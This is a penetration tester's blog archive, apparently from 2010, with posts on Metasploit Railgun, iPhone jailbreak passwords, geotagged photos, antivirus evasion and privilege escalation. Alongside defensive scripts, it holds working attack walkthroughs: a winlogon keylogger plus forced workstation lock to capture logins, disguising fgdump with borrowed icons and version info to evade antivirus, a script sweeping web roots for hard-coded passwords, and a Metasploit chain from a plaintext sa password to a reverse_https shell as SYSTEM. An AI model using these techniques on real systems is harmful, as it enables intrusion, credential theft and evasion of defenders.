Room362.com

Blatherings of a security addict.

Metasploit Turns 10,000


Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or “commits” to a project. The Metasploit Framework hit commit 10,000 today.

With the project dating back to 2003, well before the official “Revision 1” happened, there have been a lot of changes. Going from its initial incarnation as a network “game” written in Perl to the world’s largest Ruby project, the framework has seen its fair share of blood, sweat, and tears. With Express out and Pro to come, there will definitely be 10,000 more.

Congratulations to the team, both past and present. What you guys do is extraordinary.

Jailbreak SSH Horrors Strike Back


Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the default password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just won’t stay down.

If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘mobile’, which has been pointed out since 2008 (here) on the iPhone as another account whose password needs changing. But the media and the Cydia/Rock warnings only put emphasis on ‘root’.

Many iPad and iPhone apps STILL do not use the Keychain and store your password in plain text, or somewhere in a binary file (still plaintext), which the user ‘mobile’ has access to.

Ok, “so what” you say. Since this recent jailbreak was using a website, the individuals running that site now have the IP address of freshly jailbroken iPhones and iPads. I am certainly not saying that they have any ill intentions, but sites have been broken into before, and that would be one hell of a gold mine.

Hopefully AT&T has put in blocks of some sort so that it’s customers are protected, but who knows what the other countries around the world that carry iPhones are doing.

But at the very least, if you have jailbroken your iPhone, iPod Touch or iPad, please.. please set your passwords accordingly, and do not make them simple dictionary passwords.

Remember, you ARE giving up some security when you jail break your phone. It is on you to make sure that you lock what you can back down.

To change your password, use ‘Terminal’, log in to one account at a time and issue the “passwd” command. You can also just log in as root and issue “passwd mobile” to change the password of mobile.

Update on 2010-08-09 19:39 by Rob Fuller

I’ve gotten a lot of comments stating that OpenSSH isn’t installed by default and that this is not a big deal at all. A couple of problems exist in that argument though:

  1. The jailbreak is executing code on your phone/touch/iPad. Unless you do an analysis of the entire disk, you can’t be sure the jailbreak doesn’t leave some other way into the phone. Yes, that’s a far-fetched chance, but most users would never know.

  2. Even if you don’t install it out of the box, there is a good possibility that you will install OpenSSH at a later date. Better to get it fixed while you have it on your mind.
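To see at a glance which accounts in master.passwd can actually log in over SSH, here is an added Ruby script (not from this post) that parses the BSD-style file iOS ships and reports every account with an unlocked password field and a real login shell, plus any accounts that share one hash and therefore one password. The master.passwd content in the script is a constructed sample with placeholder hashes, not the real file; point it at /etc/master.passwd on the device to audit it for real.

```ruby
# Audit a BSD-style master.passwd (the layout iOS uses) for accounts that can
# still log in: a password field that is not locked and a real login shell.
LOCKED_FIELDS  = ["", "*", "!", "!!"].freeze
NOLOGIN_SHELLS = %w[/usr/bin/false /bin/false /sbin/nologin /usr/sbin/nologin].freeze

# Constructed sample in master.passwd layout; the hashes are placeholders.
# root and mobile deliberately carry the same one, as two accounts that still
# use the factory password would.
SAMPLE_MASTER_PASSWD = <<~'PW'
  # name:password:uid:gid:class:change:expire:gecos:home:shell
  nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
  root:xxPLACEHOLDERx:0:0::0:0:System Administrator:/var/root:/bin/sh
  daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
  _sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/usr/bin/false
  mobile:xxPLACEHOLDERx:501:501::0:0:Mobile User:/var/mobile:/bin/sh
PW

# Every account whose password field is usable and whose shell allows a login
def login_capable_accounts(master_passwd)
  master_passwd.each_line.map(&:chomp).map do |line|
    next if line.empty? || line.start_with?("#")
    fields = line.split(":", -1)
    next unless fields.size == 10
    name, pw, uid, _gid, _class, _change, _expire, _gecos, _home, shell = fields
    next if LOCKED_FIELDS.include?(pw) || NOLOGIN_SHELLS.include?(shell)
    { name: name, uid: uid.to_i, shell: shell, hash: pw }
  end.compact
end

# Accounts whose hashes are identical share a password: change all of them
def shared_password_groups(accounts)
  accounts.group_by { |a| a[:hash] }.values
          .select { |group| group.size > 1 }
          .map { |group| group.map { |a| a[:name] } }
end

if __FILE__ == $0
  accounts = login_capable_accounts(SAMPLE_MASTER_PASSWD)
  accounts.each { |a| puts "#{a[:name]} (uid #{a[:uid]}) can log in with #{a[:shell]}" }
  shared_password_groups(accounts).each { |names| puts "same password: #{names.join(', ')}" }
end
```

Anything the script lists is an account you should run passwd for, whether or not OpenSSH is installed yet.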

AV Tracker


Ever set up a multi/handler and get an odd IP hitting it? Probably forgot about it as internet chatter? Think again, you might have just been caught.

AV Tracker – http://avtracker.info/ is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other “Submit-your-malware-here” drop boxes use.

Peter Kleissner and his team provide

  • ranges that the hosts use
  • a dynamic text file with the IP addresses listed if you want to add it to some auto updating block list
  • a line by line IPTABLES block config
  • and even C code to add into your binary to make sure it doesn’t talk out from one of those addresses (I could be reading it wrong, still a beginner in C)

The team has been criticized a lot by AV vendors, enough so that they took down the site in January of this year. But it came back June 5th.

I use this site to help me know when the Incident Responders are on to me for my pen testing jobs. I do not wish to get in the debate of how a tool could be used.

Resources for Railgun Development


Metasploit’s Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:

  1. System Error Codes – This is hands down the best resource you have, it will tell you what that stupid “5” or “1314” means in your return value. Keep this tab open to circumvent crazed bovine attacks.

  2. theForger’s Win32 API Programming Tutorial – A really good place to start when you are getting to know the Windows API and the frustrations that come along with it. I highly recommend going through it first.

  3. MS Windows API Reference – Gigantic, and not the easiest to navigate, but really good for knowing what calls were added with each version of Windows as well as a basic (alphabetic) list of calls. Good if you know where you are going.

  4. The Undocumented Functions – Win NT/2k/XP/2k3 – A really old link but has good references to undocumented functions that have helped circumvent some of the stupidity of other more complicated functions.

  5. WineAPI Documentation – A great resource of API calls that mimic the Microsoft ones (Undocumented and Documented).

Hope this helps and I look forward to seeing what you come up with…

Intro to RailGun: WIN API for Meterpreter


Back on June 13th, “Patrick HVE” released RAILGUN:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the Metasploit trunk with revisions 9709, 9710, 9711 and 9712: http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API DLLs:

  • iphlpapi
  • ws2_32
  • kernel32
  • ntdll
  • user32
  • advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible: if it doesn’t have a DLL or function you need, you can add your own. You can read all about it in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get a shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

  • net use – Shows you what Network drives are connected, but not physical ones
  • fsutil fsinfo drives – You must be an administrator to ride this train
  • fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But railgun solves this problem with a really short script:

# Make the API call to enum drive letters
# (Update: loading the plugin first with client.core.use("railgun") is no longer needed)
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# GetLogicalDrives returns a bitmask: bit 0 is A:, bit 1 is B:, ... bit 25 is Z:
drives = []
("A".."Z").each_with_index do |letter, i|
  drives << letter if (a >> i) & 1 == 1
end
print_line("Drives Available = #{drives.inspect}")

Output: Drives Available = ["A", "C", "D", "P", "X"]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…
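Railgun also exposes GetDriveType, which answers the follow-on question of which of those letters are USB sticks and which are network shares. The Ruby below is an added example, not the script from this post: it decodes the GetLogicalDrives bitmask and classifies each root with a lookup you supply. Against a live session that lookup would be ->(root) { client.railgun.kernel32.GetDriveTypeA(root)["return"] } (assumption: GetDriveTypeA may need to be added to railgun's kernel32 definitions first); here a constructed table stands in for it so the code runs offline.

```ruby
# Decode GetLogicalDrives and classify every letter with GetDriveType, so that
# removable (USB) drives and network shares can be told apart from fixed disks.
# GetDriveType return codes, from the Win32 API documentation
DRIVE_TYPES = {
  0 => :unknown, 1 => :no_root_dir, 2 => :removable, 3 => :fixed,
  4 => :remote, 5 => :cdrom, 6 => :ramdisk
}.freeze

# Bit i of the GetLogicalDrives mask is set when drive letter i (A=0 .. Z=25) exists
def drive_letters(mask)
  ("A".."Z").each_with_index.select { |_, i| mask[i] == 1 }.map(&:first)
end

# drive_type is any callable taking a root like "C:\\" and returning the
# GetDriveType code; returns {type => [letters]}
def classify_drives(mask, drive_type)
  drive_letters(mask).each_with_object(Hash.new { |h, k| h[k] = [] }) do |letter, out|
    code = drive_type.call("#{letter}:\\")
    out[DRIVE_TYPES.fetch(code, :unknown)] << letter
  end
end

# Constructed stand-in for a live session: the A, C, D, P and X drives from the
# output above, with drive types supplied by a table instead of the API.
SAMPLE_MASK  = (1 << 0) | (1 << 2) | (1 << 3) | (1 << 15) | (1 << 23)
SAMPLE_TYPES = { "A:\\" => 2, "C:\\" => 3, "D:\\" => 5, "P:\\" => 4, "X:\\" => 4 }.freeze
SAMPLE_LOOKUP = ->(root) { SAMPLE_TYPES.fetch(root, 1) }
# In a Meterpreter script the lookup would instead be (assumption: GetDriveTypeA
# may have to be added to railgun's kernel32 definitions with add_function):
#   ->(root) { client.railgun.kernel32.GetDriveTypeA(root)["return"] }

if __FILE__ == $0
  classify_drives(SAMPLE_MASK, SAMPLE_LOOKUP).each do |type, letters|
    puts "#{type}: #{letters.join(' ')}"
  end
end
```

Because railgun calls run inside the process Meterpreter lives in, the classification reflects what that process's user can see, the same limitation as the drive listing itself.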

JEDI KEYLOGGING:

One of the problems with keylogging is you never know when that person will log in, and if you’re using a client-side exploit, they have probably already logged in and you’re hoping they log into a portal or some other password-protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon

meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*] winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize railgun and lock the workstation, forcing the user to use their credentials again.
# LockWorkStation only succeeds from a process on the interactive desktop; check GetLastError in the returned hash if "return" comes back false.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

client.core.use("railgun")
=> true
client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
exit
meterpreter >

Set up “tail -f” going on the log file for the keylogger and then kill the keylogger when you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.

Set Wallpaper Meterpreter Script


Certainly nothing to fuss over, but I’ve had a fascination with setting my target’s wallpaper as sort of a calling card for years now. I’ve been able to set the registry key (HKCU\Control Panel\Desktop\Wallpaper), but until recently I didn’t know how to get it to refresh so that it displayed without forcing the user to log out…

First, is the most important part, selection of the wallpaper. This is my first selection:

But, it has to be a BMP. So, I created:

metasploit_1024.bmp (2.3 MB)

next run:

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\metasploit_1024.bmp" /f

(Wallpaper is a REG_SZ value, not REG_MULTI_SZ, and /f overwrites the existing value without the “overwrite?” prompt, which would otherwise hang a non-interactive shell.)

and finally the magic:

rundll32.exe user32.dll,UpdatePerUserSystemParameters

That’s it; run that and it’ll refresh the settings and display the wallpaper in all of its glory. But I wouldn’t be a Metasploit dog if I didn’t make it into a meterpreter script:

download: wallpaper.rb

it’s definitely not ready to be in the trunk, but it works, just edit each of the options in the file to point at the bmp you want on the victim’s wallpaper and it’ll be there.

Todo:

  1. Make each parameter an option so there is no text editing involved
  2. Add the ability to convert other image types on the fly
  3. Figure out how to get the desktop color to refresh with the wallpaper

Get Off My Lawn! iPhone Geo Blocking


I was recently approached by savant, who told me that a bunch of my Twitpics had geo location in them. Larry Pesce from PaulDotCom has been doing research in this field for a while and each time he brings it up I casually checked a couple of my twitpics and came up empty handed.

But, he gave me exact references, so I went to Twitpic to check them out for myself.

I was surprised to see that Twitpic actually has an option to show all the “Places I’ve Been”:

Hopeful, I clicked:

Sweet! All of my images are clean right?

But, like I said, the individual gave specific references of images. So, I pointed trusty “Jeffrey’s Exif Viewer” at one of the images that they told me about and:

sure enough, it had location data in it.
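Checking images one at a time in a web EXIF viewer does not scale to a whole Twitpic archive. The Ruby below is an added example (not from this post) that pulls the GPS latitude and longitude straight out of a JPEG’s EXIF APP1 segment and returns nil when there is no GPS IFD; the geotagged JPEG it checks is constructed inside the script, so nothing here is a real photo. Feed it File.binread of each image before deciding what to delete.

```ruby
# Answers "does this JPEG carry a GPS position?" by walking the EXIF APP1
# segment to the GPS IFD. No gems needed; input is the raw file bytes.
EXIF_HEADER = "Exif\0\0".b
GPS_IFD_TAG = 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004

# Read an unsigned 16- or 32-bit integer at off, honouring the TIFF byte order
def tiff_u(tiff, off, size, big)
  return nil if off.nil?
  bytes = tiff[off, size]
  return nil if bytes.nil? || bytes.bytesize < size
  bytes.unpack1(size == 2 ? (big ? "n" : "v") : (big ? "N" : "V"))
end

# Return {tag => [type, count, offset_of_value_field]} for the IFD at off
def ifd_entries(tiff, off, big)
  n = tiff_u(tiff, off, 2, big) or return {}
  (0...n).each_with_object({}) do |i, entries|
    e = off + 2 + i * 12
    tag, type, count = tiff_u(tiff, e, 2, big), tiff_u(tiff, e + 2, 2, big), tiff_u(tiff, e + 4, 4, big)
    break entries if count.nil?          # truncated IFD
    entries[tag] = [type, count, e + 8]  # e + 8 is the 4-byte value-or-offset field
  end
end

# Degrees/minutes/seconds stored as three RATIONALs (type 5) -> decimal degrees
def dms_to_decimal(tiff, entry, big)
  return nil unless entry && entry[0] == 5 && entry[1] == 3
  off = tiff_u(tiff, entry[2], 4, big)
  return nil if off.nil?
  parts = (0...3).map do |i|
    num = tiff_u(tiff, off + i * 8, 4, big)
    den = tiff_u(tiff, off + i * 8 + 4, 4, big)
    return nil if num.nil? || den.nil? || den.zero?
    num.to_f / den
  end
  parts[0] + parts[1] / 60 + parts[2] / 3600
end

# {lat:, lon:} in signed decimal degrees, or nil if the JPEG has no GPS data
def exif_gps(jpeg)
  jpeg = jpeg.b
  return nil unless jpeg[0, 2] == "\xFF\xD8".b
  pos, tiff = 2, nil
  while pos + 4 <= jpeg.bytesize
    marker = jpeg.getbyte(pos + 1)
    len = jpeg[pos + 2, 2].unpack1("n")      # segment length includes these 2 bytes
    if marker == 0xE1 && jpeg[pos + 4, 6] == EXIF_HEADER
      tiff = jpeg[pos + 10, len - 8]
      break
    end
    break if marker == 0xDA                  # start of scan: no more metadata segments
    pos += 2 + len
  end
  return nil unless tiff && tiff.bytesize >= 8
  big = tiff[0, 2] == "MM".b
  ifd0 = ifd_entries(tiff, tiff_u(tiff, 4, 4, big), big)
  gps_ptr = ifd0[GPS_IFD_TAG] or return nil
  gps = ifd_entries(tiff, tiff_u(tiff, gps_ptr[2], 4, big), big)
  lat = dms_to_decimal(tiff, gps[GPS_LAT], big)
  lon = dms_to_decimal(tiff, gps[GPS_LON], big)
  return nil unless lat && lon
  lat = -lat if gps[GPS_LAT_REF] && tiff[gps[GPS_LAT_REF][2], 1] == "S"
  lon = -lon if gps[GPS_LON_REF] && tiff[gps[GPS_LON_REF][2], 1] == "W"
  { lat: lat, lon: lon }
end

# --- constructed sample input (not a real photo) ---
def tiff_entry(tag, type, count, value)
  field = value.is_a?(String) ? value.b.ljust(4, "\0") : [value].pack("V")
  [tag, type, count].pack("vvV") + field
end

# A JPEG whose only content is an EXIF APP1 segment with a GPS IFD saying
# 38 deg 53' 23" N, 77 deg 02' 13" W (little-endian TIFF, offsets hand-laid).
def sample_geotagged_jpeg
  tiff = "II".b + [0x2A, 8].pack("vV")                                        # header; IFD0 at 8
  tiff << [1].pack("v") << tiff_entry(GPS_IFD_TAG, 4, 1, 26) << [0].pack("V")  # IFD0 ends at 26
  tiff << [4].pack("v")                                                        # GPS IFD: 4 entries
  tiff << tiff_entry(GPS_LAT_REF, 2, 2, "N\0") << tiff_entry(GPS_LAT, 5, 3, 80)
  tiff << tiff_entry(GPS_LON_REF, 2, 2, "W\0") << tiff_entry(GPS_LON, 5, 3, 104)
  tiff << [0].pack("V")                                                        # GPS IFD ends at 80
  tiff << [38, 1, 53, 1, 23, 1].pack("V*")                                     # lat rationals at 80
  tiff << [77, 1, 2, 1, 13, 1].pack("V*")                                      # lon rationals at 104
  app1 = EXIF_HEADER + tiff
  "\xFF\xD8".b + "\xFF\xE1".b + [app1.bytesize + 2].pack("n") + app1 + "\xFF\xD9".b
end

if __FILE__ == $0
  p exif_gps(sample_geotagged_jpeg)
end
```

Both TIFF byte orders are handled (Apple writes big-endian “MM”, the sample uses “II”), and any truncated or missing structure along the way simply yields nil rather than an exception, which is what you want when sweeping a directory of untrusted uploads.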

At a recent NoVA Hackers meetup there was a presentation on Geo forensics on mobile phones that was really enlightening, but very depressing for iPhone users like myself. For us, you can either have Location Services (GPS) on, or off. In other words, if you wanted to take a picture without geo information, you would have to open your settings, go into general, switch location services to off.. then when you wanted to use Google Maps to find something you’d have to turn it back on.

Complaints of a lazy person, I know, but remembering to check, and / or going through those steps each time I wanted to find a place or take a picture was a bit beyond my tolerance level.

iPhone OS 4.0 to the rescue: (calling it iOS 4 is just confusing re:cisco)

One of the coolest new features is app based control of geo information. So go to Settings –> General –> Location Services and turn Camera (and any other app you take photos with) OFF.

PS: You probably don’t need those pics sitting on Twitpic after your Tweet has come and gone. Might as well delete them. ;–) Sorry guys, I hope you have local copies.

AV Bypass Made Stupid


WARNING if you use fgdump like I did, it extracts pwdump to %TEMP% at run time, which is detected by AV.

First of all, I was floored when this worked. Really AV? It’s that easy? Really?

So here is the breakdown: go get “Resource Hacker”… You’re almost done. Only 3 steps left (1 of which is optional).

I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10. You see this on your AV report for your domain controller, and you’re having a bad day, probably week.

Watch this magic trick though:

[*] Step 1:

Open Res Hacker and drag a “normal” executable on to the window or Open File.

Click “Save All Resources”

Essentially what you are doing in this step is simply extracting the .ico file (Icon) from the executable. Now you can do this with other tools, but we’ll be using resource hacker in a minute again, so it’s just easy to do it all with one tool.

We are done with this executable unless you are doing Step 2, in that case, leave it open, open another Res Hacker window and open your ‘evil’. (In our case, fgdump.exe)

[*] Step 2 (Optional):

If your destination executable has tell-tale signs of its intent, much like fgdump as seen below:

You can simply copy and paste the version info from your ‘normal’ executable into your new one and hit “Compile Script”:

[*] Step 3:

Next we need to “Add a new Resource” (our icon) into our “evil” binary.

Once this prompt comes up, select the ICO file that shows the icon you want it to have (some binaries have a ton, so make sure it’s the right one). Put in ‘1’ for resource name, and ‘1033’ for your resource language. (You can play with these values, not sure what impact they have, but from the binaries I’ve looked at those values are pretty standard for a windows executable; 1033 is the Windows language identifier for US English.)

Save your new awesome binary as something else, I chose vlc2.exe

And… (drum roll)

Tada! Sad isn’t it? Only 1 of the top 10 AV now detect this binary. Good job AVG and Avast! You still picked it up, but Trend, Symantec, Microsoft, ClamAV, Kaspersky, Panda, Norman, NOD32, Sunbelt, F-Secure, Fortinet, BitDefender WTF guys!?

Oh and Kaspersky now flags it as “not-a-virus” but still flags it.

A Very Important Link…


Normally I save links for my “Mubix Links” blog to keep the clutter down on this one, but I think this is one that I would like to highlight as important. The NFO, credits and summary of this copyrighted video are what I wish to highlight.

http://thepiratebay.org/torrent/5573874/Hackers_Wanted_%282008%29

I am against the misuse of copyrighted material, and it is a violation of laws in many countries, including my own.

I really wish this video would have been published, I’m sure it would have been a very interesting video, that I definitely would have purchased.

0Exploit Privilege Escalation


The other day Chris Gates posted an excellent blog post about the WebDAV hotness that Chris Sullo (author of Nikto) cooked up (DAVTest), which Ryan Linn turned into a Metasploit module.

Anyway, the story left off with a very limited user called “Network Service”. This user has Read and Execute, but no Write access, and a very limited field of view to boot.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Lets look around a bit..

meterpreter > pwd

C:\Inetpub\wwwroot

meterpreter > ls

Listing: C:\Inetpub\wwwroot
===========================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
40777/rwxrwxrwx  0  dir  Fri May 07 09:32:19 -0400 2010  .
40777/rwxrwxrwx  0  dir  Mon May 03 12:51:48 -0400 2010  ..
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  admin
100666/rw-rw-rw-  1587  fil  Sat Dec 08 23:01:24 -0500 2001  default.asp
100666/rw-rw-rw-  1465  fil  Sat Dec 08 23:01:24 -0500 2001  default.css
100666/rw-rw-rw-  3295  fil  Thu Jan 03 12:40:48 -0500 2002  forgotpass.asp
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  images
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  language
100666/rw-rw-rw-  1802  fil  Thu Jan 24 12:10:04 -0500 2002  logoff.asp
100666/rw-rw-rw-  7785  fil  Sat Jun 15 19:49:20 -0400 2002  logon.asp
100666/rw-rw-rw-  1801  fil  Mon May 03 12:42:45 -0400 2010  settings.asp
100666/rw-rw-rw-  21137  fil  Wed Aug 28 11:31:42 -0400 2002  setup.asp

Sweet! a “settings.asp”

meterpreter > cat settings.asp

<SCRIPT LANGUAGE = "VBScript">
<(editorial snip)>
SQLUser = "sa"
SQLPass = "SuperDuper#@rdP@$$w0rd2012"
<(/editorial snip)>
</SCRIPT>

SA with clear text password. Good luck bruteforcing that one. But they block 1433 directly to the box so direct SQL queries are out. No problem.
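Finding settings.asp by eye works when the web root is this small; on a bigger site you want to sweep every file you can read for the same pattern. The Ruby below is an added example (not from this post) that scans a tree of downloaded files for hard-coded database credentials, both the VBScript assignment style seen above and classic ADO connection strings. The three files it scans are constructed samples standing in for a wwwroot pulled back with Meterpreter’s download command; the only real detail reused is the settings.asp pair.

```ruby
# Sweep a web root for hard-coded database credentials of the kind found in
# settings.asp above, so the whole tree gets checked rather than one lucky file.
# Input is {relative_path => contents}, e.g. files pulled back with Meterpreter's
# download command.
CRED_PATTERNS = [
  # VBScript/ASP style assignments: SQLPass = "..."  dbPassword = '...'
  /\b(?<key>\w*(?:pass|pwd|passwd)\w*)\s*=\s*["'](?<value>[^"']+)["']/i,
  # ADO/ODBC connection strings: ...;Password=...;  ...;pwd=...;
  /(?<key>pwd|password)\s*=\s*(?<value>[^;"'\s]+)/i
].freeze
# Username assignments, including the two-word "User ID=" form
USER_PATTERN = /\b(?<key>\w*(?:user|uid|login)[\w ]*?)\s*=\s*["']?(?<value>[^"';\s]+)/i

# Constructed sample standing in for a downloaded wwwroot (single-quoted
# heredocs so nothing in the passwords is interpolated)
SAMPLE_WWWROOT = {
  "settings.asp" => <<~'ASP',
    <SCRIPT LANGUAGE = "VBScript">
    SQLServer = "192.168.56.3"
    SQLUser = "sa"
    SQLPass = "SuperDuper#@rdP@$$w0rd2012"
    </SCRIPT>
  ASP
  "admin/db.inc" => <<~'INC',
    ' classic ADO connection string
    conn = "Provider=SQLOLEDB;Data Source=192.168.56.3;User ID=webapp;Password=Wint3r2010;"
  INC
  "logon.asp" => "<% ' nothing to see here %>\n"
}.freeze

# Returns one finding per line that carries a password; the username is taken
# from the same line or, failing that, the last username seen in that file.
def find_credentials(files)
  findings = []
  files.each do |path, text|
    last_user = nil
    text.each_line.with_index(1) do |line, lineno|
      user = USER_PATTERN.match(line)
      last_user = user[:value] if user
      CRED_PATTERNS.each do |re|
        m = re.match(line) or next
        findings << { file: path, line: lineno, key: m[:key],
                      user: last_user, password: m[:value] }
        break
      end
    end
  end
  findings
end

if __FILE__ == $0
  find_credentials(SAMPLE_WWWROOT).each do |f|
    puts "#{f[:file]}:#{f[:line]} #{f[:key]} -> #{f[:user].inspect} / #{f[:password]}"
  end
end
```

Every hit is a credential to try with mssql_login through the pivot, exactly as below; the file and line number tell you which application owns it, which matters when the report gets written.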

Pivoting to the rescue:

meterpreter >
Background session 1? [y/N] 

msf exploit(handler) > route add 192.168.56.0 255.255.255.0 1

msf exploit(handler) > route print

Active Routing Table
====================
Subnet  Netmask  Gateway
------  -------  -------
192.168.56.0  255.255.255.0  Session 1

Then we use mssql_login to check to see if our creds are right (set BLANK_PASSWORDS to false since we already know the password and we aren’t trying to brute force it). This will be routed through our meterpreter session that has NETWORK SERVICE permissions.

msf exploit(handler) > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false

msf auxiliary(mssql_login) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3

msf auxiliary(mssql_login) > run

[*] 192.168.56.3:1433 - MSSQL - Trying username:'sa' with password:'SuperDuper#@rdP@$$w0rd2012'

[+] 192.168.56.3:1433 - MSSQL - successful login 'sa' : 'SuperDuper#@rdP@$$w0rd2012'

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cool. Now some enumeration and check to see if xp_cmdshell is enabled (it outputs a lot of info so I cut it down to just the pieces we are looking for):

msf exploit(mssql_login) > use admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf auxiliary(mssql_enum) > set RHOST 192.168.56.3
RHOST => 192.168.56.3

msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...

[*] Version:
[*] Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
[*] Aug  6 2000 00:57:48
[*] Copyright (c) 1988-2000 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

<(editorial snip)>

[*] xp_cmdshell is Enabled

<(/editorial snip)>

[*] Instances found on this server:
[*]  MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] LocalSystem
[*] Auxiliary module execution completed

xp_cmdshell is enabled and the SQL Server service runs as LocalSystem. Looking good, payload time.

msf auxiliary(mssql_enum) > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https

msf exploit(mssql_payload) > set LHOST 10.10.10.59
LHOST => 10.10.10.59

msf exploit(mssql_payload) > set RHOST 192.168.56.3
RHOST => 192.168.56.3

msf exploit(mssql_payload) > set LPORT 443
LPORT => 443

msf exploit(mssql_payload) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf exploit(mssql_payload) > exploit

[*] HTTPS listener started on https://10.10.10.59:443/
[*] Command Stager progress - 2.78% done (1494/53675 bytes)
[*] Command Stager progress - 5.57% done (2988/53675 bytes)
[*] Command Stager progress - 8.35% done (4482/53675 bytes)

<(editorial snip)>

[*] Command Stager progress - 94.64% done (50796/53675 bytes)
[*] Command Stager progress - 97.32% done (52235/53675 bytes)
[*] 192.168.56.3:1061 Request received for /AvlbV...
[*] 192.168.56.3:1061 Staging connection for target vlbV received...
[*] Patching Target ID vlbV into DLL
[*] 192.168.56.3:1062 Request received for /BvlbV...
[*] 192.168.56.3:1062 Stage connection for target vlbV received...

[*] Meterpreter session 2 opened (10.10.10.59:443 -> 192.168.56.3:1062) at Thu May 06 22:03:50 -0400 2010

[*] Exploit completed, but no session was created.
msf exploit(mssql_payload) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Game over..

Note: routing only sends the module (be it exploit or aux) through the session. Once the payload runs (for exploit modules), it calls straight back to LHOST (the attacker box), not through the session, so the target has to be able to reach LHOST directly; if it can’t, use a bind payload or a port forward through session 1 instead of a reverse one. In this example the callback arrives directly, so you can now exit session 1 (NETWORK SERVICE) as it isn’t really needed any more.